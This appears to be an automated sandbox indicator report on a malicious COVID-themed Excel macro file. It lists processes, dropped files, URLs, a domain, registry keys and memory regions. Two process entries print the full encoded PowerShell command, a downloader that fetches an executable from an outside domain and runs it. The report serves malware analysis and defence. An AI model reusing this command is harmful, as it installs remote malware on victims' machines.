IOCReport

loading gif

Files

File Path
Type
Category
Malicious
COVID.XLSM
Microsoft Excel 2007+
initial sample
malicious
C:\Users\user\Desktop\~$COVID.XLSM
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6078775.png
PNG image data, 858 x 377, 8-bit colormap, non-interlaced
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\665Y5FDQ12L8FV52M3S3.temp
data
dropped
clean

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c 'powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcwBhAHYAZQBfAHAAYQB0AGgACgB9AAoACgBQAFMALQBJAG4AcwB0AGEAbABsAGUAcgBWADIAIAAiAGgAdAB0AHAAcwA6AC8ALwBhAHcAbQBlAGwAaQBzAGUAcgBzAC4AYwBvAG0AIgAgACIAYQBwAGkALwB2ADMALwBhAGMAaAB5AHIAYQBuAHQAaABlAHMALwBjAG8AbgB0AHIAYQBwAG8AbABhAHIAaQB6AGEAdABpAG8AbgAvAGsAdQBsAHQAdQByAGsAcgBlAGkAcwAiACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAIgAgACIAQQB3AG0AZQBsAGkAcwBlAHIAcwAgAFMAZQByAHYAaQBjAGUAIgAgACIAZQB4AGUAIgAgACQARgBhAGwAcwBlAA=='
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcwBhAHYAZQBfAHAAYQB0AGgACgB9AAoACgBQAFMALQBJAG4AcwB0AGEAbABsAGUAcgBWADIAIAAiAGgAdAB0AHAAcwA6AC8ALwBhAHcAbQBlAGwAaQBzAGUAcgBzAC4AYwBvAG0AIgAgACIAYQBwAGkALwB2ADMALwBhAGMAaAB5AHIAYQBuAHQAaABlAHMALwBjAG8AbgB0AHIAYQBwAG8AbABhAHIAaQB6AGEAdABpAG8AbgAvAGsAdQBsAHQAdQByAGsAcgBlAGkAcwAiACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAIgAgACIAQQB3AG0AZQBsAGkAcwBlAHIAcwAgAFMAZQByAHYAaQBjAGUAIgAgACIAZQB4AGUAIgAgACQARgBhAGwAcwBlAA==
malicious

URLs

Name
IP
Malicious
https://awmelisers.comp
unknown
clean
http://www.piriform.com/ccleaner
unknown
clean
http://www.%s.comPA
unknown
clean
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
unknown
clean
https://awmelisers.com
unknown
clean
https://awmelisers.com/api/v3/achyranthes/contrapolarization/kulturkreis
unknown
clean
https://awmelisers.comPE
unknown
clean
https://awmelisers.com/0
unknown
clean

Domains

Name
IP
Malicious
awmelisers.com
206.81.23.172
clean

IPs

IP
Domain
Country
Malicious
206.81.23.172
awmelisers.com
United States
clean

Registry

Path
Value
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
k'3
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
MTTT
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
VBAFiles
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
ReviewToken
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
EC7B2
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
c&3
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Max Display
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Max Display
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 1
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 2
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 3
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 4
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 5
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 6
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 7
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 8
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 9
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 10
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 11
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 12
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 13
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 14
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 15
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 16
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 17
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 18
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 19
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 20
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
F3DAC
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Max Display
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Max Display
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 1
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 2
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 3
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 4
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 5
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 6
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 7
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 8
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 9
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 10
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 11
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 12
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 13
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 14
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 15
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 16
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 17
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 18
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 19
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Item 20
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
F3ED5
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
LastPurgeTime
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
1033
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
1033
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
EXCELFiles
clean
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
ProductFiles
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EnableFileTracing
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EnableConsoleTracing
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileTracingMask
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ConsoleTracingMask
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MaxFileSize
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileDirectory
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EnableFileTracing
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EnableConsoleTracing
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileTracingMask
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ConsoleTracingMask
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MaxFileSize
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileDirectory
clean
There are 59 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
3494000
unkown
page read and write
clean
40E000
heap default
page read and write
clean
2F33000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
1BED000
unkown
page read and write
clean
2030000
unkown
page readonly
clean
7FF000E0000
unkown
page read and write
clean
2C1F000
unkown
page read and write
clean
2F92000
unkown
page read and write
clean
1B569000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
7FF00112000
unkown
page execute and read and write
clean
2780000
unkown
page read and write
clean
2F72000
unkown
page read and write
clean
2AB0000
heap private
page execute and read and write
clean
7FF00012000
unkown
page execute and read and write
clean
3515000
unkown
page read and write
clean
7FF00210000
unkown
page read and write
clean
3522000
unkown
page read and write
clean
1BCFD000
unkown
page read and write
clean
2F14000
unkown
page read and write
clean
1E0000
unkown
page read and write
clean
20C0000
unkown
page readonly
clean
7FF0024A000
unkown
page execute and read and write
clean
428000
heap default
page read and write
clean
3746000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
28F0000
unkown
page read and write
clean
2FAD000
unkown
page read and write
clean
1FEB000
unkown
page readonly
clean
352B000
unkown
page read and write
clean
12D31000
unkown
page read and write
clean
7FF00020000
unkown
page read and write
clean
2F2D000
unkown
page read and write
clean
3765000
unkown
page read and write
clean
1F8F000
unkown
page read and write
clean
34E6000
unkown
page read and write
clean
D0000
unkown
page readonly
clean
2B30000
unkown
page readonly
clean
2F00000
unkown
page read and write
clean
3358000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
12C21000
unkown
page read and write
clean
318C000
unkown
page read and write
clean
1B5E8000
unkown
page read and write
clean
2F45000
unkown
page read and write
clean
3BF000
heap default
page read and write
clean
2E93000
unkown
page read and write
clean
2C1E000
unkown
page read and write | page guard
clean
3525000
unkown
page read and write
clean
3362000
unkown
page read and write
clean
41B000
heap default
page read and write
clean
1C94E000
unkown
page read and write
clean
2F7C000
unkown
page read and write
clean
2F0D000
unkown
page read and write
clean
2860000
unkown
page read and write
clean
430000
unkown
page readonly
clean
7FF0002C000
unkown
page execute and read and write
clean
2780000
unkown
page read and write
clean
2E83000
unkown
page read and write
clean
1C83E000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
216000
unkown
page read and write
clean
3160000
unkown
page read and write
clean
2C21000
unkown
page read and write
clean
330000
heap default
page read and write
clean
2780000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
2F4C000
unkown
page read and write
clean
29F0000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
20000
heap private
page read and write
clean
7FF00190000
unkown
page execute and read and write
clean
2F3A000
unkown
page read and write
clean
12C25000
unkown
page read and write
clean
100000
heap private
page read and write
clean
1B2F0000
unkown
page read and write
clean
1B593000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
2F50000
unkown
page read and write
clean
1B5EB000
unkown
page read and write
clean
30C0000
unkown
page read and write
clean
12D91000
unkown
page read and write
clean
1C74E000
unkown
page read and write
clean
10C000
heap private
page read and write
clean
7FF0001A000
unkown
page execute and read and write
clean
7FF000D2000
unkown
page execute and read and write
clean
3449000
unkown
page read and write
clean
29F0000
unkown
page readonly
clean
1DE0000
unkown
page write copy
clean
2835000
unkown
page read and write
clean
41E000
heap default
page read and write
clean
3BEC000
unkown
page read and write
clean
33C000
heap default
page read and write
clean
3156000
unkown
page read and write
clean
2E71000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
7FF00280000
unkown
page execute and read and write
clean
1B50D000
unkown
page read and write
clean
7FF000E5000
unkown
page read and write
clean
7FFFFF10000
unkown
page execute and read and write
clean
7FFFFF00000
unkown
page execute and read and write
clean
1FB0000
unkown
page readonly
clean
2EF2000
unkown
page read and write
clean
1B9C0000
unkown
page read and write
clean
7FF00260000
unkown
page read and write
clean
2FB3000
unkown
page read and write
clean
2A07000
heap private
page read and write
clean
3554000
unkown
page read and write
clean
3512000
unkown
page read and write
clean
30B5000
unkown
page read and write
clean
3BE6000
unkown
page read and write
clean
2FC3000
unkown
page read and write
clean
7FF00170000
unkown
page execute and read and write
clean
1B60000
unkown
page readonly
clean
2780000
unkown
page read and write
clean
5B0000
unkown
page readonly
clean
3557000
unkown
page read and write
clean
2AA0000
unkown
page readonly
clean
7FF00180000
unkown
page read and write
clean
3551000
unkown
page read and write
clean
2390000
unkown
page readonly
clean
1D00000
unkown
page readonly
clean
281E000
unkown
page read and write
clean
2A10000
unkown
page readonly
clean
2A90000
unkown
page readonly
clean
7FF00220000
unkown
page execute and read and write
clean
2E7D000
unkown
page read and write
clean
2830000
unkown
page read and write
clean
1B5E4000
unkown
page read and write
clean
353E000
unkown
page read and write
clean
1B5B9000
unkown
page read and write
clean
12ED2000
unkown
page read and write
clean
7FF001D0000
unkown
page execute and read and write
clean
309A000
unkown
page read and write
clean
7FF000EA000
unkown
page execute and read and write
clean
3166000
unkown
page read and write
clean
1BF5000
heap private
page read and write
clean
2E61000
unkown
page read and write
clean
1B413000
heap private
page read and write
clean
2780000
unkown
page read and write
clean
1BF0000
heap private
page read and write
clean
2780000
unkown
page read and write
clean
1C36000
unkown
page read and write
clean
1B900000
unkown
page write copy
clean
1B517000
unkown
page read and write
clean
1E60000
unkown
page read and write
clean
350C000
unkown
page read and write
clean
2FDF000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
283A000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
29F0000
unkown
page read and write
clean
2A04000
heap private
page read and write
clean
1FCC000
unkown
page readonly
clean
2EEB000
unkown
page read and write
clean
2040000
heap private
page read and write
clean
2780000
unkown
page read and write
clean
31CA000
unkown
page read and write
clean
2020000
unkown
page readonly
clean
2E67000
unkown
page read and write
clean
28EF000
unkown
page read and write
clean
207B000
heap private
page read and write
clean
372000
heap default
page read and write
clean
2FC0000
unkown
page read and write
clean
1B5C7000
unkown
page read and write
clean
2E90000
unkown
page read and write
clean
1B5F4000
unkown
page read and write
clean
150000
unkown
page readonly
clean
315D000
unkown
page read and write
clean
350F000
unkown
page read and write
clean
1D6000
unkown
page read and write
clean
7FF00022000
unkown
page execute and read and write
clean
1AC80000
unkown
page read and write
clean
2EA6000
unkown
page read and write
clean
2A00000
heap private
page read and write
clean
12C4C000
unkown
page read and write
clean
7FF00270000
unkown
page execute and read and write
clean
2FDC000
unkown
page read and write
clean
1C00000
unkown
page read and write
clean
312A000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
2045000
heap private
page read and write
clean
2F89000
unkown
page read and write
clean
110000
unkown
page read and write
clean
2E64000
unkown
page read and write
clean
104000
heap private
page read and write
clean
1BBF0000
heap private
page read and write
clean
7FF001A0000
unkown
page read and write
clean
2F8F000
unkown
page read and write
clean
2C57000
unkown
page read and write
clean
3541000
unkown
page read and write
clean
3E8000
heap default
page read and write
clean
2EFC000
unkown
page read and write
clean
3767000
unkown
page read and write
clean
2AF0000
heap private
page execute and read and write
clean
2926000
unkown
page read and write
clean
60000
unkown
page readonly
clean
354E000
unkown
page read and write
clean
2FFC000
unkown
page read and write
clean
1E80000
heap private
page execute and read and write
clean
7FF000D0000
unkown
page read and write
clean
7FF001E0000
unkown
page read and write
clean
E0000
unkown
page read and write
clean
2E5E000
unkown
page read and write
clean
2C81000
unkown
page read and write
clean
3538000
unkown
page read and write
clean
2E8D000
unkown
page read and write
clean
2F5A000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
7FF001C0000
unkown
page read and write
clean
2FBD000
unkown
page read and write
clean
1B510000
unkown
page read and write
clean
2C5A000
unkown
page read and write
clean
2EE2000
unkown
page read and write
clean
7FF00200000
unkown
page execute and read and write
clean
12E70000
unkown
page read and write
clean
1FC0000
unkown
page readonly
clean
1F90000
unkown
page readonly
clean
2F61000
unkown
page read and write
clean
1B400000
heap private
page read and write
clean
2780000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
7FF00250000
unkown
page execute and read and write
clean
F0000
unkown
page write copy
clean
2FD2000
unkown
page read and write
clean
1BB20000
heap private
page read and write
clean
1F00000
unkown
page read and write
clean
2FE2000
unkown
page read and write
clean
2F6E000
unkown
page read and write
clean
1D5000
unkown
page read and write | page guard
clean
2780000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
2ABA000
heap private
page execute and read and write
clean
2F67000
unkown
page read and write
clean
1C750000
unkown
page readonly
clean
34F6000
unkown
page read and write
clean
7FF001E7000
unkown
page read and write
clean
7FF001F0000
unkown
page read and write
clean
2EE7000
unkown
page read and write
clean
3163000
unkown
page read and write
clean
2820000
unkown
page readonly
clean
353B000
unkown
page read and write
clean
7FF00240000
unkown
page execute and read and write
clean
2EAA000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
7FF00160000
unkown
page execute and read and write
clean
2780000
unkown
page read and write
clean
2F09000
unkown
page read and write
clean
1B5C2000
unkown
page read and write
clean
7FF00150000
unkown
page read and write
clean
35CC000
unkown
page read and write
clean
2F40000
unkown
page read and write
clean
2F8C000
unkown
page read and write
clean
3420000
unkown
page read and write
clean
1FC7000
unkown
page readonly
clean
7FF001B0000
unkown
page execute and read and write
clean
2FBA000
unkown
page read and write
clean
3528000
unkown
page read and write
clean
1CAF0000
heap private
page read and write
clean
35B7000
unkown
page read and write
clean
There are 252 hidden memdumps, click here to show them.